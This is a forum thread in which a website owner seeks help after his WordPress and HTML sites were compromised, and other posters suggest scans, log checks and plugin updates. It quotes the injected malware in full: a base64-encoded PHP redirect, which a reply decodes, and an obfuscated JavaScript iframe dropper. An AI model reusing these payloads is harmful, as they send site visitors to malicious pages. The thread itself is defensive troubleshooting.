Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

I've a keylogger and can't get rid of it

  • 14-02-2012 10:41pm
    #1
    Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭


    I've somehow got a keylogger on my PC.

    It keeps accessing my FTP ( 2 different hosting accounts with different companies ) and installing badware/phising sites etc on my domains.

    It installs this code into the index pages and sometimes other pages
    <?php	 	eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
    /**
    

    This happened a few months ago on one of my servers. I changed all the passwords etc .. ran virus scans etc but I must not have removed it.

    What is the best thing to do apart from formatting the HDD ?

    I'm running malwarebyte now but what else ?


Comments

  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    I've a few wordpress press sites and they have put this code on every single page !! sometimes more then once !


  • Registered Users, Registered Users 2 Posts: 3,568 ✭✭✭ethernet


    NeVeR wrote: »
    I've a few wordpress press sites and they have put this code on every single page !! sometimes more then once !

    Yip. Best to edit it out of the template.

    That base 64 reads as follows:

    [PHP]
    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm){
    $referer=$_SERVER;
    $uag=$_SERVER;
    if ($uag) {
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
    header("Location: http://froling.bee.pl/");
    exit();
    }
    }
    }
    }
    [/PHP]


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    how did you get that ?

    Also is there some find of tool to edit and remove from every page? there's over 100 pages.. I'd say close to 1000 pages infected.


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    oh found out how you got that..

    What can i use to give my PC the best scan


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    I just ran the latest Trojan Remover and it came back with nothing !

    Going to do a big scan now.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 10,339 ✭✭✭✭LoLth


    if you're using windows,

    download the USB version of superantispyware and then go get hijackthis

    throw onto a USB key.

    restart in safemode

    run both utilities (for hijackthis, save the log file to the USB key)

    from a different machine, analyze the hijackthis logfile at :
    http://www.hijackthis.de/


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    Just wondering why do i need a different PC to check it ?

    I'll try this when i get home.

    I do have full access to my normal PC, It's just my FTP files they are being targeted.. and i'm sure some other stuff as well.

    Thanks i'll try this when i'm home.


  • Registered Users, Registered Users 2 Posts: 10,339 ✭✭✭✭LoLth


    because you will have run hijackthis with the PC running in safemode.. where nothign runs unless you tell it to, so it would be better not to go browsing the internet (assuming you've selected safemode with networking) with your AV/AM disabled. you could restart the PC normally, check the log file and then go and manually edit the registry but that would be an unnecessary risk and not advisable, or you could boot back into safemode, run hijackthis again and see if you can remember 100% which registry key did the log file website say was bad and which one was ok but not advised. then of course you've got the reg keys that were marked bad by users but are actually ok applications if you know they are there and the users just took a disliking to them. Also, you have to assume that whatever infection it is does not have the extremely unusual characteristic of moving its registry info on reboot or renewing any browser/dll hooks which would change the result picked up in hijackthis.

    you might not want to restart because you should have hijackthis open while you check the report at the URL i gave and you can easily find the correlating tickbox to remove the registry key that is being reported as bad (note this is editing the registry so *ONLY* elect to remove registry keys you know are bad. best bet if you are unsure is find more information about the program/key online - which is better to do with hijackthis open so you can cross reference).

    I'm not being smart here but if you arent familiar with anti-virus / anti-malware the best advise I can give you is get a friend or relative with tech support experience to do this for you or drop your pc in to a local computer repair company and ask them to do a clean up. oh, and make a back up! (full system, infection and all).

    on a side note: how did you come to the conclusion that you have a virus, and more specifically a keylogger? (how do you know its on your PC and not on the webserver - buried in the basic template you use?)


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    thanks for the reply.

    My FTP account on 2 different hosting accounts ( they are in to totally different counties ) both where accessed and these code uploaded to every page on my server over 40 websites - 1000's of pages

    Also they uploaded folders with credit card phishing schemes - I only found out about them when 2 different banks emailed me.

    Google marked my sites are malicious and i had to good through a few steps to remove the badware and get google to review them so they can be listed again.

    The 1st case happened about 2 months ago on 1 server - I removed all the files and did a total PC scan using malwarebytes. I thought I got everything out of there but yesterday one of my sites went down on my second server - I've about 20 domains on this one.. and again every page had this code in it...

    I can only assume they keylogged my FTP details.

    The sites that where effected where mainly wordpress sites.. but also some normal HTML sites.

    Funny thing is the support guy on my hosting account said there was no logins from anywhere other then my location... so i've no idea really.


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    LoLth wrote: »

    I'm not being smart here but if you arent familiar with anti-virus / anti-malware the best advise I can give you is get a friend or relative with tech support experience to do this for you or drop your pc in to a local computer repair company and ask them to do a clean up. oh, and make a back up! (full system, infection and all).

    Funny thing is i am.. I'm the guy my friends all give there PCs/Laptops to to fix.. and I do they them fixed.. But i've never had a keylogger before.. and never accessing my FTP.

    It's normally just a worm / virus etc

    I've used hijackthis loads of times when a browser jacking occurs or something to that effect.

    I didn't know abut using a second PC to check the file. It makes sense. But i didn't have a second PC/Laptop to hand. I'll get my g/f laptop later.. in work now.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 4,676 ✭✭✭Gavin


    NeVeR wrote: »
    thanks for the reply.

    My FTP account on 2 different hosting accounts ( they are in to totally different counties ) both where accessed and these code uploaded to every page on my server over 40 websites - 1000's of pages


    The sites that where effected where mainly wordpress sites.. but also some normal HTML sites.

    Funny thing is the support guy on my hosting account said there was no logins from anywhere other then my location... so i've no idea really.

    It's more likely that you are running a vulnerable version of some web based software. Do you have access to your web server logs? If you do, you can go through them to see how the attacker is getting in. Get the last modified date on your infected files and look in the log file around that date.

    Update wordpress and all your plugins as well.


  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    It might also be a good idea to check for rogue .htaccess files on the server with malicious redirects in them. I came across a load these in multiple directories when dealing with a very similar problem.


  • Registered Users, Registered Users 2 Posts: 10,339 ✭✭✭✭LoLth


    as Gavin and tricky D posted +

    do your FTP accounts share any commonalities (user/pass the same for each?). one compromised could easily lead to the other being discovered by a bot crawling through vulnerable wordpress pages. Do any of your wordpress pages link to your other website?

    while a keylogger is a possibility and should not be ruled out, its not the only possibility so not turning up a culprit in your scan does not necessarily mean the scan isnt doing its job (especially if you have been running the scans in normal running made and not safemode).


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    Thanks lads. I'll check those when i get home. ( in work now )

    As for the FTP i'm the only one that ever accesses it.

    I use cpanel - So i'm not sure is there are web server logs in there. But I will check later.

    thanks.


  • Registered Users, Registered Users 2 Posts: 10,339 ✭✭✭✭LoLth


    wasnt there a cpanel FTP vulnerability recently? I seem to rememebr getting an email from my hosting company about why I had to change all my passwords and why FTP was being disabled (oh, and why the new management console was horrible!)


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    i didnt hear anything. but i'll look into it.


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    It's possible one of the accounts with the two different hosting companies was compromised first. Then they took your email and passwd hash, and cracked it (assuming there the same passwords) logged into your email account and took all your hosting ftp/cpanel credentials.


  • Registered Users, Registered Users 2 Posts: 6,289 ✭✭✭Talisman


    Have a look on your webserver for timthumb.php - if you have a WordPress then it's quite likely to be there, it's used to dynamically crop/resize images in many themes. There was a vulnerability found in it about 6 months ago that allowed rogue code to be uploaded to the server and executed and unfortunately not all affected themes have been updated with the fix.

    The solution is to replace the file with an updated version from the TimThumb Project.

    Details of the exploit: Zero Day Vulnerability in many WordPress Themes


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    Talisman where would i find that file. I had a look in a few folders but couldn't see it.

    But today I come with a new problem

    The following code is now being placed in all my index pages across all my sites ( on the same server )
    <script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,57.5,50,59,60,60,52,57,58.5,22,48.5,51,47.5,54,50.5,49.5,51.5,55,22,54,47.5,53.5,49.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,57.5,50,59,60,60,52,57,58.5,22,48.5,51,47.5,54,50.5,49.5,51.5,55,22,54,47.5,53.5,49.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f+'C'+'ode'](-h*(1+n[j]));}q=ss;e(q);</script>
    

    I delete it and within a few minutes it is back !!

    I am working on ways to improve my wordpress sites security. But I have to find the source of this problem. It's wrecking my head.

    Has anything seen this code before and know how to find whatever is reposting it.


  • Advertisement
  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q




  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    So from those links It appears a plugin is causing this to happen.

    How can i tell which one ?

    Also these sites are a few months old why is it only happening now

    I'll try those steps tomorrow. As i've no time today.

    thanks.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    It might be a new wordpress vulnerability using old malware code. I haven't read into it too much, but hats why you may only be seeing it now.

    But I think you should pick strong credentials and attempt that removal guide. Most likely its able to spread itself if your .php files are writable.

    I think you can make use of htaccess files to protect admin pages of wordpress where you can only access thee pages from certain ip's.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    A report of one site suffering from similar. Im sure you can scan your website using this malware scanning site blow:
    http://sitecheck.sucuri.net/results/vigrxonline.net

    suggest this malware infection:
    http://sucuri.net/malware/malware-entry-mwjs160
    Domains distributing malware:

    hxxp://vvesek.freetcp.com/i/i.php?go=
    (many others)
    You can see the end of the url "i.php?go=1" is similar to the link in the code of the unpacked/de-obfuscated javascript in the link I posted above.

    Hints that maybe passwords on your local machine may have been stolen. I suggest you try clean up your pc/laptop first before proceeding to cleaning the wordpress blog.


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    Ive looked at WP-scan but no idea how to use it.

    I take it you need root access or something ?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Did you try any of the suggestions in the posts above?


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    I've backed up my databases and I've just purchased a new hosting account.

    On my infected server I've really only 2 sites I care about.

    So when I am about to start them up I'll do a full scan of PC again .. i do one everyday.. What should i be using .. I use Malwarebytes at the moment.

    Also I will be using a fresh install of wordpress and only installing verified pluggin's

    Also a question I had. I made backups of the 2 databases using PHPMYADMIN.

    Would these backups carry the virus over to the new server/hosting ?

    I will also be using better passwords. I am to blame for using default ones :( So from now on they will be a lot different.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    NeVeR wrote: »
    I've backed up my databases and I've just purchased a new hosting account.

    On my infected server I've really only 2 sites I care about.

    So when I am about to start them up I'll do a full scan of PC again .. i do one everyday.. What should i be using .. I use Malwarebytes at the moment.
    Try updating malware bytes and do a scan in safe mode

    Also I will be using a fresh install of wordpress and only installing verified pluggin's

    Also a question I had. I made backups of the 2 databases using PHPMYADMIN.

    Would these backups carry the virus over to the new server/hosting ? its possible, but I think its more likely that your .php and .html files are infected.

    I will also be using better passwords. I am to blame for using default ones :( So from now on they will be a lot different.


    See in bold above.


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    thanks.

    So i take it the backup doesn't have php and html files in it.. never had this problem before so I've never restored a backup etc.


  • Advertisement
Advertisement